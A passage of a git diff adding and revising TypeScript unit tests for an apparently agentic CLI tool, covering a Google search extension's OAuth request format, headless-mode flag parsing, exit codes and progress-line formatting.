-    process.env.GEMINI_API_KEY = originalKey;
-  }
+  const registeredTool = (pi as any).registeredTool;
+  const result = await registeredTool.execute("call-2", { query: "test" }, new AbortController().signal, () => {}, mockCtx);
+  assert.equal(result.isError, true);
+  assert.ok(result.content[0].text.includes("No authentication found"));
 });
 
-test("google-search uses GEMINI_API_KEY if present (precedence)", async () => {
+test("google-search uses GEMINI_API_KEY if present (precedence)", async (t) => {
   process.env.GEMINI_API_KEY = "mock-api-key";
 
-  try {
-    const pi = createMockPI();
-    googleSearchExtension(pi as any);
+  t.after(() => delete process.env.GEMINI_API_KEY);
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
 
-    const notifications: any[] = [];
-    const mockCtx = {
-      ui: { notify(msg: string, level: string) { notifications.push({ msg, level }); } },
-      modelRegistry: mockModelRegistry(JSON.stringify({ token: "should-not-be-used", projectId: "mock-project" })),
-    };
+  const notifications: any[] = [];
+  const mockCtx = {
+    ui: { notify(msg: string, level: string) { notifications.push({ msg, level }); } },
+    modelRegistry: mockModelRegistry(JSON.stringify({ token: "should-not-be-used", projectId: "mock-project" })),
+  };
 
-    await pi.fire("session_start", {}, mockCtx);
-    assert.equal(notifications.length, 0, "Should NOT notify if API Key is present");
-  } finally {
-    delete process.env.GEMINI_API_KEY;
-  }
+  await pi.fire("session_start", {}, mockCtx);
+  assert.equal(notifications.length, 0, "Should NOT notify if API Key is present");
 });
diff --git a/src/tests/google-search-oauth-shape.test.ts b/src/tests/google-search-oauth-shape.test.ts
new file mode 100644
index 000000000..66aa072e5
--- /dev/null
+++ b/src/tests/google-search-oauth-shape.test.ts
@@ -0,0 +1,215 @@
+/**
+ * google-search-oauth-shape.test.ts — Regression test for #2963.
+ *
+ * The OAuth fallback in google_search manually POSTs to the Cloud Code Assist
+ * endpoint.  The original implementation sent a request body that did not match
+ * the endpoint's expected contract, causing a 400 INVALID_ARGUMENT response.
+ *
+ * This test captures the fetch call and asserts that the URL and body conform
+ * to the Cloud Code Assist wire format used by the working provider in
+ * packages/pi-ai/src/providers/google-gemini-cli.ts.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import googleSearchExtension from "../resources/extensions/google-search/index.js";
+
+// ── Helpers ─────────────────────────────────────────────────────────────────
+
+function createMockPI() {
+  const handlers: Array<{ event: string; handler: any }> = [];
+  let registeredTool: any = null;
+
+  return {
+    handlers,
+    get registeredTool() { return registeredTool; },
+    on(event: string, handler: any) {
+      handlers.push({ event, handler });
+    },
+    registerTool(tool: any) {
+      registeredTool = tool;
+    },
+    async fire(event: string, eventData: any, ctx: any) {
+      for (const h of handlers) {
+        if (h.event === event) {
+          await h.handler(eventData, ctx);
+        }
+      }
+    },
+  };
+}
+
+function mockModelRegistry(oauthJson?: string) {
+  return {
+    authStorage: {
+      hasAuth: async (_id: string) => !!oauthJson,
+    },
+    getApiKeyForProvider: async (_provider: string) => oauthJson,
+  };
+}
+
+/** A valid SSE response body matching the Cloud Code Assist wire format. */
+function makeOkSSEBody() {
+  const payload = {
+    response: {
+      candidates: [{
+        content: {
+          parts: [{ text: "Sunny, 85 °F in Austin today." }],
+        },
+        groundingMetadata: {
+          groundingChunks: [
+            { web: { title: "weather.com", uri: "https://weather.com/austin", domain: "weather.com" } },
+          ],
+          webSearchQueries: ["weather today in Austin Texas"],
+        },
+      }],
+    },
+  };
+  return `data: ${JSON.stringify(payload)}\n\n`;
+}
+
+// ── Tests ────────────────────────────────────────────────────────────────────
+
+test("#2963: OAuth fallback URL must include ?alt=sse query parameter", async (t) => {
+  const originalKey = process.env.GEMINI_API_KEY;
+  delete process.env.GEMINI_API_KEY;
+  const originalFetch = global.fetch;
+
+  let capturedUrl = "";
+
+  (global as any).fetch = async (url: string, _options: any) => {
+    capturedUrl = url;
+    return { ok: true, text: async () => makeOkSSEBody() };
+  };
+
+  t.after(() => {
+    global.fetch = originalFetch;
+    if (originalKey !== undefined) process.env.GEMINI_API_KEY = originalKey;
+    else delete process.env.GEMINI_API_KEY;
+  });
+
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
+
+  const oauthJson = JSON.stringify({ token: "tok", projectId: "proj" });
+  const ctx = { ui: { notify() {} }, modelRegistry: mockModelRegistry(oauthJson) };
+
+  await pi.fire("session_start", {}, ctx);
+  await pi.registeredTool.execute("c1", { query: "weather" }, new AbortController().signal, () => {}, ctx);
+
+  assert.ok(
+    capturedUrl.includes("?alt=sse"),
+    `URL must contain ?alt=sse for SSE parsing to work. Got: ${capturedUrl}`,
+  );
+});
+
+test("#2963: OAuth fallback body must include userAgent field", async (t) => {
+  const originalKey = process.env.GEMINI_API_KEY;
+  delete process.env.GEMINI_API_KEY;
+  const originalFetch = global.fetch;
+
+  let capturedBody: any = null;
+
+  (global as any).fetch = async (_url: string, options: any) => {
+    capturedBody = JSON.parse(options.body);
+    return { ok: true, text: async () => makeOkSSEBody() };
+  };
+
+  t.after(() => {
+    global.fetch = originalFetch;
+    if (originalKey !== undefined) process.env.GEMINI_API_KEY = originalKey;
+    else delete process.env.GEMINI_API_KEY;
+  });
+
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
+
+  const oauthJson = JSON.stringify({ token: "tok", projectId: "proj" });
+  const ctx = { ui: { notify() {} }, modelRegistry: mockModelRegistry(oauthJson) };
+
+  await pi.fire("session_start", {}, ctx);
+  await pi.registeredTool.execute("c2", { query: "weather userAgent test" }, new AbortController().signal, () => {}, ctx);
+
+  assert.ok(capturedBody, "fetch must have been called");
+  assert.equal(
+    typeof capturedBody.userAgent,
+    "string",
+    "Body must include a userAgent field (Cloud Code Assist contract)",
+  );
+});
+
+test("#2963: OAuth fallback body must contain google_search tool in correct format", async (t) => {
+  const originalKey = process.env.GEMINI_API_KEY;
+  delete process.env.GEMINI_API_KEY;
+  const originalFetch = global.fetch;
+
+  let capturedBody: any = null;
+
+  (global as any).fetch = async (_url: string, options: any) => {
+    capturedBody = JSON.parse(options.body);
+    return { ok: true, text: async () => makeOkSSEBody() };
+  };
+
+  t.after(() => {
+    global.fetch = originalFetch;
+    if (originalKey !== undefined) process.env.GEMINI_API_KEY = originalKey;
+    else delete process.env.GEMINI_API_KEY;
+  });
+
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
+
+  const oauthJson = JSON.stringify({ token: "tok", projectId: "proj" });
+  const ctx = { ui: { notify() {} }, modelRegistry: mockModelRegistry(oauthJson) };
+
+  await pi.fire("session_start", {}, ctx);
+  await pi.registeredTool.execute("c3", { query: "weather tools test" }, new AbortController().signal, () => {}, ctx);
+
+  assert.ok(capturedBody, "fetch must have been called");
+  const tools = capturedBody.request?.tools;
+  assert.ok(Array.isArray(tools), "request.tools must be an array");
+  assert.ok(
+    tools.some((t: any) => t.googleSearch !== undefined),
+    `tools must contain a googleSearch entry. Got: ${JSON.stringify(tools)}`,
+  );
+});
+
+test("#2963: OAuth fallback body has correct top-level structure", async (t) => {
+  const originalKey = process.env.GEMINI_API_KEY;
+  delete process.env.GEMINI_API_KEY;
+  const originalFetch = global.fetch;
+
+  let capturedBody: any = null;
+
+  (global as any).fetch = async (_url: string, options: any) => {
+    capturedBody = JSON.parse(options.body);
+    return { ok: true, text: async () => makeOkSSEBody() };
+  };
+
+  t.after(() => {
+    global.fetch = originalFetch;
+    if (originalKey !== undefined) process.env.GEMINI_API_KEY = originalKey;
+    else delete process.env.GEMINI_API_KEY;
+  });
+
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
+
+  const oauthJson = JSON.stringify({ token: "tok", projectId: "proj" });
+  const ctx = { ui: { notify() {} }, modelRegistry: mockModelRegistry(oauthJson) };
+
+  await pi.fire("session_start", {}, ctx);
+  await pi.registeredTool.execute("c4", { query: "weather structure test" }, new AbortController().signal, () => {}, ctx);
+
+  assert.ok(capturedBody, "fetch must have been called");
+
+  // Top-level fields required by CloudCodeAssistRequest
+  assert.equal(capturedBody.project, "proj", "project must match the OAuth projectId");
+  assert.ok(typeof capturedBody.model === "string" && capturedBody.model.length > 0, "model must be a non-empty string");
+  assert.ok(capturedBody.request && typeof capturedBody.request === "object", "request must be an object");
+  assert.ok(typeof capturedBody.userAgent === "string", "userAgent must be present");
+
+  // Nested request fields
+  assert.ok(Array.isArray(capturedBody.request.contents), "request.contents must be an array");
+  assert.ok(Array.isArray(capturedBody.request.tools), "request.tools must be an array");
+});
diff --git a/src/tests/headless-cli-surface.test.ts b/src/tests/headless-cli-surface.test.ts
new file mode 100644
index 000000000..3bf552a7c
--- /dev/null
+++ b/src/tests/headless-cli-surface.test.ts
@@ -0,0 +1,425 @@
+/**
+ * Tests for S02 CLI surface — --output-format, exit codes, HeadlessJsonResult, --resume.
+ *
+ * Uses extracted parsing logic (mirrors headless.ts) and direct imports from
+ * headless-types.ts / headless-events.ts to avoid transitive @gsd/native
+ * import that breaks in test environment.
+ */
+
+import test from 'node:test'
+import assert from 'node:assert/strict'
+
+// ─── Import exit code constants & mapStatusToExitCode ──────────────────────
+
+import {
+  EXIT_SUCCESS,
+  EXIT_ERROR,
+  EXIT_BLOCKED,
+  EXIT_CANCELLED,
+  mapStatusToExitCode,
+} from '../headless-events.js'
+
+import type { OutputFormat, HeadlessJsonResult } from '../headless-types.js'
+import { VALID_OUTPUT_FORMATS } from '../headless-types.js'
+
+// ─── Extracted parsing logic (mirrors headless.ts) ─────────────────────────
+
+interface HeadlessOptions {
+  timeout: number
+  json: boolean
+  outputFormat: OutputFormat
+  model?: string
+  command: string
+  commandArgs: string[]
+  context?: string
+  contextText?: string
+  auto?: boolean
+  verbose?: boolean
+  maxRestarts?: number
+  supervised?: boolean
+  responseTimeout?: number
+  answers?: string
+  eventFilter?: Set<string>
+  resumeSession?: string
+  bare?: boolean
+}
+
+function parseHeadlessArgs(argv: string[]): HeadlessOptions {
+  const options: HeadlessOptions = {
+    timeout: 300_000,
+    json: false,
+    outputFormat: 'text',
+    command: 'auto',
+    commandArgs: [],
+  }
+
+  const args = argv.slice(2)
+
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i]
+    if (arg === 'headless') continue
+
+    if (arg.startsWith('--')) {
+      if (arg === '--timeout' && i + 1 < args.length) {
+        options.timeout = parseInt(args[++i], 10)
+      } else if (arg === '--json') {
+        options.json = true
+        options.outputFormat = 'stream-json'
+      } else if (arg === '--output-format' && i + 1 < args.length) {
+        const fmt = args[++i]
+        if (!VALID_OUTPUT_FORMATS.has(fmt)) {
+          throw new Error(`Invalid output format: ${fmt}`)
+        }
+        options.outputFormat = fmt as OutputFormat
+        if (fmt === 'stream-json' || fmt === 'json') {
+          options.json = true
+        }
+      } else if (arg === '--model' && i + 1 < args.length) {
+        options.model = args[++i]
+      } else if (arg === '--context' && i + 1 < args.length) {
+        options.context = args[++i]
+      } else if (arg === '--context-text' && i + 1 < args.length) {
+        options.contextText = args[++i]
+      } else if (arg === '--auto') {
+        options.auto = true
+      } else if (arg === '--verbose') {
+        options.verbose = true
+      } else if (arg === '--max-restarts' && i + 1 < args.length) {
+        options.maxRestarts = parseInt(args[++i], 10)
+      } else if (arg === '--answers' && i + 1 < args.length) {
+        options.answers = args[++i]
+      } else if (arg === '--events' && i + 1 < args.length) {
+        options.eventFilter = new Set(args[++i].split(','))
+        options.json = true
+        if (options.outputFormat === 'text') {
+          options.outputFormat = 'stream-json'
+        }
+      } else if (arg === '--supervised') {
+        options.supervised = true
+        options.json = true
+        if (options.outputFormat === 'text') {
+          options.outputFormat = 'stream-json'
+        }
+      } else if (arg === '--response-timeout' && i + 1 < args.length) {
+        options.responseTimeout = parseInt(args[++i], 10)
+      } else if (arg === '--resume' && i + 1 < args.length) {
+        options.resumeSession = args[++i]
+      } else if (arg === '--bare') {
+        options.bare = true
+      }
+    } else if (options.command === 'auto') {
+      options.command = arg
+    } else {
+      options.commandArgs.push(arg)
+    }
+  }
+
+  return options
+}
+
+// ─── --output-format flag parsing ──────────────────────────────────────────
+
+test('--output-format text sets outputFormat to text', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--output-format', 'text', 'auto'])
+  assert.equal(opts.outputFormat, 'text')
+  assert.equal(opts.json, false)
+})
+
+test('--output-format json sets outputFormat to json and json=true', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--output-format', 'json', 'auto'])
+  assert.equal(opts.outputFormat, 'json')
+  assert.equal(opts.json, true)
+})
+
+test('--output-format stream-json sets outputFormat to stream-json and json=true', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--output-format', 'stream-json', 'auto'])
+  assert.equal(opts.outputFormat, 'stream-json')
+  assert.equal(opts.json, true)
+})
+
+test('default output format is text', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', 'auto'])
+  assert.equal(opts.outputFormat, 'text')
+  assert.equal(opts.json, false)
+})
+
+test('invalid --output-format value throws', () => {
+  assert.throws(
+    () => parseHeadlessArgs(['node', 'gsd', 'headless', '--output-format', 'yaml', 'auto']),
+    /Invalid output format: yaml/,
+  )
+})
+
+test('invalid --output-format value (empty) throws', () => {
+  assert.throws(
+    () => parseHeadlessArgs(['node', 'gsd', 'headless', '--output-format', 'xml', 'auto']),
+    /Invalid output format/,
+  )
+})
+
+// ─── --json backward compatibility ─────────────────────────────────────────
+
+test('--json is alias for --output-format stream-json', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--json', 'auto'])
+  assert.equal(opts.outputFormat, 'stream-json')
+  assert.equal(opts.json, true)
+})
+
+test('--json before --output-format json: last writer wins', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--json', '--output-format', 'json', 'auto'])
+  assert.equal(opts.outputFormat, 'json')
+  assert.equal(opts.json, true)
+})
+
+// ─── --resume flag ─────────────────────────────────────────────────────────
+
+test('--resume parses session ID', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--resume', 'abc-123', 'auto'])
+  assert.equal(opts.resumeSession, 'abc-123')
+  assert.equal(opts.command, 'auto')
+})
+
+test('no --resume means undefined', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', 'auto'])
+  assert.equal(opts.resumeSession, undefined)
+})
+
+// ─── Exit code constants ───────────────────────────────────────────────────
+
+test('EXIT_SUCCESS is 0', () => {
+  assert.equal(EXIT_SUCCESS, 0)
+})
+
+test('EXIT_ERROR is 1', () => {
+  assert.equal(EXIT_ERROR, 1)
+})
+
+test('EXIT_BLOCKED is 10', () => {
+  assert.equal(EXIT_BLOCKED, 10)
+})
+
+test('EXIT_CANCELLED is 11', () => {
+  assert.equal(EXIT_CANCELLED, 11)
+})
+
+// ─── mapStatusToExitCode ───────────────────────────────────────────────────
+
+test('mapStatusToExitCode: success → 0', () => {
+  assert.equal(mapStatusToExitCode('success'), EXIT_SUCCESS)
+})
+
+test('mapStatusToExitCode: complete → 0', () => {
+  assert.equal(mapStatusToExitCode('complete'), EXIT_SUCCESS)
+})
+
+test('mapStatusToExitCode: error → 1', () => {
+  assert.equal(mapStatusToExitCode('error'), EXIT_ERROR)
+})
+
+test('mapStatusToExitCode: timeout → 1', () => {
+  assert.equal(mapStatusToExitCode('timeout'), EXIT_ERROR)
+})
+
+test('mapStatusToExitCode: blocked → 10', () => {
+  assert.equal(mapStatusToExitCode('blocked'), EXIT_BLOCKED)
+})
+
+test('mapStatusToExitCode: cancelled → 11', () => {
+  assert.equal(mapStatusToExitCode('cancelled'), EXIT_CANCELLED)
+})
+
+test('mapStatusToExitCode: unknown status defaults to EXIT_ERROR', () => {
+  assert.equal(mapStatusToExitCode('unknown'), EXIT_ERROR)
+  assert.equal(mapStatusToExitCode(''), EXIT_ERROR)
+})
+
+// ─── HeadlessJsonResult type shape ─────────────────────────────────────────
+
+test('HeadlessJsonResult satisfies expected shape', () => {
+  // Type-level assertion: construct a valid object and verify it compiles.
+  // At runtime, verify all required keys exist.
+  const result: HeadlessJsonResult = {
+    status: 'success',
+    exitCode: 0,
+    duration: 12345,
+    cost: { total: 0.05, input_tokens: 1000, output_tokens: 500, cache_read_tokens: 200, cache_write_tokens: 100 },
+    toolCalls: 15,
+    events: 42,
+  }
+  assert.equal(result.status, 'success')
+  assert.equal(result.exitCode, 0)
+  assert.equal(typeof result.duration, 'number')
+  assert.ok(result.cost)
+  assert.equal(typeof result.cost.total, 'number')
+  assert.equal(typeof result.cost.input_tokens, 'number')
+  assert.equal(typeof result.cost.output_tokens, 'number')
+  assert.equal(typeof result.cost.cache_read_tokens, 'number')
+  assert.equal(typeof result.cost.cache_write_tokens, 'number')
+  assert.equal(typeof result.toolCalls, 'number')
+  assert.equal(typeof result.events, 'number')
+})
+
+test('HeadlessJsonResult accepts optional fields', () => {
+  const result: HeadlessJsonResult = {
+    status: 'blocked',
+    exitCode: 10,
+    sessionId: 'sess-abc',
+    duration: 5000,
+    cost: { total: 0, input_tokens: 0, output_tokens: 0, cache_read_tokens: 0, cache_write_tokens: 0 },
+    toolCalls: 0,
+    events: 1,
+    milestone: 'M001',
+    phase: 'planning',
+    nextAction: 'fix blocker',
+    artifacts: ['ROADMAP.md'],
+    commits: ['abc1234'],
+  }
+  assert.equal(result.sessionId, 'sess-abc')
+  assert.equal(result.milestone, 'M001')
+  assert.deepEqual(result.artifacts, ['ROADMAP.md'])
+  assert.deepEqual(result.commits, ['abc1234'])
+})
+
+// ─── VALID_OUTPUT_FORMATS set ──────────────────────────────────────────────
+
+test('VALID_OUTPUT_FORMATS contains exactly text, json, stream-json', () => {
+  assert.equal(VALID_OUTPUT_FORMATS.size, 3)
+  assert.ok(VALID_OUTPUT_FORMATS.has('text'))
+  assert.ok(VALID_OUTPUT_FORMATS.has('json'))
+  assert.ok(VALID_OUTPUT_FORMATS.has('stream-json'))
+})
+
+// ─── Regression: existing flags still parse correctly ──────────────────────
+
+test('--events still works with new outputFormat default', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--events', 'agent_end,tool_execution_start', 'auto'])
+  assert.ok(opts.eventFilter instanceof Set)
+  assert.equal(opts.eventFilter!.size, 2)
+  assert.equal(opts.json, true)
+  assert.equal(opts.outputFormat, 'stream-json')
+})
+
+test('--timeout still works', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--timeout', '60000', 'auto'])
+  assert.equal(opts.timeout, 60000)
+})
+
+test('--supervised still works and implies stream-json', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--supervised', 'auto'])
+  assert.equal(opts.supervised, true)
+  assert.equal(opts.json, true)
+  assert.equal(opts.outputFormat, 'stream-json')
+})
+
+test('--answers still works', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--answers', 'answers.json', 'auto'])
+  assert.equal(opts.answers, 'answers.json')
+})
+
+test('positional command parsing still works', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', 'next'])
+  assert.equal(opts.command, 'next')
+})
+
+test('combined flags parse correctly', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    '--output-format', 'json',
+    '--timeout', '120000',
+    '--resume', 'sess-xyz',
+    '--verbose',
+    'auto',
+  ])
+  assert.equal(opts.outputFormat, 'json')
+  assert.equal(opts.json, true)
+  assert.equal(opts.timeout, 120000)
+  assert.equal(opts.resumeSession, 'sess-xyz')
+  assert.equal(opts.verbose, true)
+  assert.equal(opts.command, 'auto')
+})
+
+// ─── --bare flag ───────────────────────────────────────────────────────────
+
+test('--bare sets bare to true', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--bare', 'auto'])
+  assert.equal(opts.bare, true)
+  assert.equal(opts.command, 'auto')
+})
+
+test('no --bare means bare is undefined', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', 'auto'])
+  assert.equal(opts.bare, undefined)
+})
+
+test('--bare is a boolean flag (no value needed)', () => {
+  const opts = parseHeadlessArgs(['node', 'gsd', 'headless', '--bare', '--json', 'auto'])
+  assert.equal(opts.bare, true)
+  assert.equal(opts.json, true)
+})
+
+test('--bare combined with --output-format json', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    '--bare',
+    '--output-format', 'json',
+    'auto',
+  ])
+  assert.equal(opts.bare, true)
+  assert.equal(opts.outputFormat, 'json')
+  assert.equal(opts.json, true)
+  assert.equal(opts.command, 'auto')
+})
+
+// ─── Command-first ordering (flags after command) ─────────────────────────
+
+test('command before flags: new-milestone --context-text --auto --verbose', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    'new-milestone',
+    '--context-text', 'build something cool',
+    '--auto',
+    '--verbose',
+  ])
+  assert.equal(opts.command, 'new-milestone')
+  assert.equal(opts.contextText, 'build something cool')
+  assert.equal(opts.auto, true)
+  assert.equal(opts.verbose, true)
+})
+
+test('command before flags: next --json --timeout', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    'next',
+    '--json',
+    '--timeout', '60000',
+  ])
+  assert.equal(opts.command, 'next')
+  assert.equal(opts.json, true)
+  assert.equal(opts.timeout, 60000)
+})
+
+test('command between flags: --auto new-milestone --verbose', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    '--auto',
+    'new-milestone',
+    '--verbose',
+  ])
+  assert.equal(opts.command, 'new-milestone')
+  assert.equal(opts.auto, true)
+  assert.equal(opts.verbose, true)
+})
+
+test('--bare does not affect other flags', () => {
+  const opts = parseHeadlessArgs([
+    'node', 'gsd', 'headless',
+    '--bare',
+    '--timeout', '60000',
+    '--resume', 'sess-abc',
+    'auto',
+  ])
+  assert.equal(opts.bare, true)
+  assert.equal(opts.timeout, 60000)
+  assert.equal(opts.resumeSession, 'sess-abc')
+  assert.equal(opts.command, 'auto')
+})
diff --git a/src/tests/headless-events.test.ts b/src/tests/headless-events.test.ts
index 12a6e8ca0..60c0695e7 100644
--- a/src/tests/headless-events.test.ts
+++ b/src/tests/headless-events.test.ts
@@ -149,3 +149,39 @@ test('empty filter blocks all events', () => {
   assert.ok(!shouldEmit('agent_end'))
   assert.ok(!shouldEmit('message_update'))
 })
+
+import { mapStatusToExitCode, EXIT_SUCCESS, EXIT_ERROR, EXIT_BLOCKED, EXIT_CANCELLED } from '../headless-events.js'
+
+// ─── mapStatusToExitCode ─────────────────────────────────────────────────
+
+test('mapStatusToExitCode: "complete" returns EXIT_SUCCESS', () => {
+  assert.equal(mapStatusToExitCode('complete'), EXIT_SUCCESS)
+})
+
+test('mapStatusToExitCode: "completed" returns EXIT_SUCCESS', () => {
+  assert.equal(mapStatusToExitCode('completed'), EXIT_SUCCESS)
+})
+
+test('mapStatusToExitCode: "success" returns EXIT_SUCCESS', () => {
+  assert.equal(mapStatusToExitCode('success'), EXIT_SUCCESS)
+})
+
+test('mapStatusToExitCode: "error" returns EXIT_ERROR', () => {
+  assert.equal(mapStatusToExitCode('error'), EXIT_ERROR)
+})
+
+test('mapStatusToExitCode: "timeout" returns EXIT_ERROR', () => {
+  assert.equal(mapStatusToExitCode('timeout'), EXIT_ERROR)
+})
+
+test('mapStatusToExitCode: "blocked" returns EXIT_BLOCKED', () => {
+  assert.equal(mapStatusToExitCode('blocked'), EXIT_BLOCKED)
+})
+
+test('mapStatusToExitCode: "cancelled" returns EXIT_CANCELLED', () => {
+  assert.equal(mapStatusToExitCode('cancelled'), EXIT_CANCELLED)
+})
+
+test('mapStatusToExitCode: unknown status returns EXIT_ERROR', () => {
+  assert.equal(mapStatusToExitCode('unknown'), EXIT_ERROR)
+})
diff --git a/src/tests/headless-multi-turn.test.ts b/src/tests/headless-multi-turn.test.ts
new file mode 100644
index 000000000..19cb1b9bb
--- /dev/null
+++ b/src/tests/headless-multi-turn.test.ts
@@ -0,0 +1,19 @@
+/**
+ * Regression test for #3547: discuss and plan must be classified as
+ * multi-turn commands in headless mode.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+test("headless.ts classifies discuss as multi-turn (#3547)", () => {
+  const src = readFileSync(join(__dirname, "..", "headless.ts"), "utf-8");
+  const multiTurnLine = src.match(/isMultiTurnCommand\s*=\s*[^;]+/);
+  assert.ok(multiTurnLine, "isMultiTurnCommand must be defined");
+  assert.ok(multiTurnLine![0].includes("discuss"), "discuss must be in multi-turn list");
+  assert.ok(multiTurnLine![0].includes("plan"), "plan must be in multi-turn list");
+});
diff --git a/src/tests/headless-progress.test.ts b/src/tests/headless-progress.test.ts
new file mode 100644
index 000000000..fd6763870
--- /dev/null
+++ b/src/tests/headless-progress.test.ts
@@ -0,0 +1,300 @@
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { formatProgress, formatThinkingLine, formatCostLine, summarizeToolArgs } from '../headless-ui.js'
+import type { ProgressContext } from '../headless-ui.js'
+
+// Tests run with NO_COLOR or non-TTY stderr, so ANSI codes are empty strings.
+// We test content, not escape sequences.
+
+function ctx(overrides: Partial<ProgressContext> = {}): ProgressContext {
+  return { verbose: true, ...overrides }
+}
+
+describe('formatProgress', () => {
+  describe('tool_execution_start', () => {
+    it('shows tool name and summarized args in verbose mode', () => {
+      const result = formatProgress({
+        type: 'tool_execution_start',
+        toolName: 'bash',
+        args: { command: 'npm run build' },
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('bash'))
+      assert.ok(result.includes('npm run build'))
+    })
+
+    it('shows Read with file path', () => {
+      const result = formatProgress({
+        type: 'tool_execution_start',
+        toolName: 'Read',
+        args: { path: 'src/main.ts' },
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Read'))
+      assert.ok(result.includes('src/main.ts'))
+    })
+
+    it('returns null in non-verbose mode', () => {
+      const result = formatProgress({
+        type: 'tool_execution_start',
+        toolName: 'bash',
+        args: { command: 'npm run build' },
+      }, ctx({ verbose: false }))
+      assert.equal(result, null)
+    })
+
+    it('shows tool name alone when no args', () => {
+      const result = formatProgress({
+        type: 'tool_execution_start',
+        toolName: 'unknown_tool',
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('unknown_tool'))
+    })
+  })
+
+  describe('tool_execution_end', () => {
+    it('shows error with duration in verbose mode', () => {
+      const result = formatProgress({
+        type: 'tool_execution_end',
+        toolName: 'bash',
+      }, ctx({ isError: true, toolDuration: 1500 }))
+      assert.ok(result)
+      assert.ok(result.includes('bash'))
+      assert.ok(result.includes('error'))
+      assert.ok(result.includes('1.5s'))
+    })
+
+    it('shows done with duration in verbose mode', () => {
+      const result = formatProgress({
+        type: 'tool_execution_end',
+        toolName: 'read',
+      }, ctx({ toolDuration: 50 }))
+      assert.ok(result)
+      assert.ok(result.includes('done'))
+      assert.ok(result.includes('50ms'))
+    })
+
+    it('returns null in non-verbose mode', () => {
+      const result = formatProgress({
+        type: 'tool_execution_end',
+        toolName: 'bash',
+        isError: false,
+      }, ctx({ verbose: false }))
+      assert.equal(result, null)
+    })
+  })
+
+  describe('agent lifecycle', () => {
+    it('shows agent_start', () => {
+      const result = formatProgress({ type: 'agent_start' }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Session started'))
+    })
+
+    it('shows agent_end', () => {
+      const result = formatProgress({ type: 'agent_end' }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Session ended'))
+    })
+
+    it('shows agent_end with cost', () => {
+      const result = formatProgress({ type: 'agent_end' }, ctx({
+        lastCost: { costUsd: 0.42, inputTokens: 10000, outputTokens: 500 },
+      }))
+      assert.ok(result)
+      assert.ok(result.includes('Session ended'))
+      assert.ok(result.includes('$0.42'))
+      assert.ok(result.includes('10500 tokens'))
+    })
+  })
+
+  describe('extension_ui_request', () => {
+    it('shows notify with message', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'notify',
+        message: 'Auto-mode started',
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Auto-mode started'))
+    })
+
+    it('bolds important notifications', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'notify',
+        message: 'Committed: fix auth flow',
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Committed: fix auth flow'))
+    })
+
+    it('suppresses empty notify', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'notify',
+        message: '',
+      }, ctx())
+      assert.equal(result, null)
+    })
+
+    it('suppresses empty setStatus', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'setStatus',
+        statusKey: '',
+        message: '',
+      }, ctx())
+      assert.equal(result, null)
+    })
+
+    it('shows setStatus with statusKey as phase', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'setStatus',
+        statusKey: 'milestone:M001',
+        message: 'Hello World CLI',
+      }, ctx())
+      assert.ok(result)
+      assert.ok(result.includes('Milestone'))
+      assert.ok(result.includes('M001'))
+    })
+
+    it('suppresses setWidget (TUI-only)', () => {
+      const result = formatProgress({
+        type: 'extension_ui_request',
+        method: 'setWidget',
+        widgetKey: 'progress',
+      }, ctx())
+      assert.equal(result, null)
+    })
+  })
+
+  describe('unknown events', () => {
+    it('returns null', () => {
+      assert.equal(formatProgress({ type: 'some_random_event' }, ctx()), null)
+    })
+  })
+})
+
+describe('summarizeToolArgs', () => {
+  it('extracts path for Read', () => {
+    assert.equal(summarizeToolArgs('Read', { path: 'src/index.ts' }), 'src/index.ts')
+  })
+
+  it('extracts path for write', () => {
+    assert.equal(summarizeToolArgs('write', { path: '/tmp/out.json' }), '/tmp/out.json')
+  })
+
+  it('extracts file_path for legacy compatibility', () => {
+    assert.equal(summarizeToolArgs('read', { file_path: 'src/foo.ts' }), 'src/foo.ts')
+  })
+
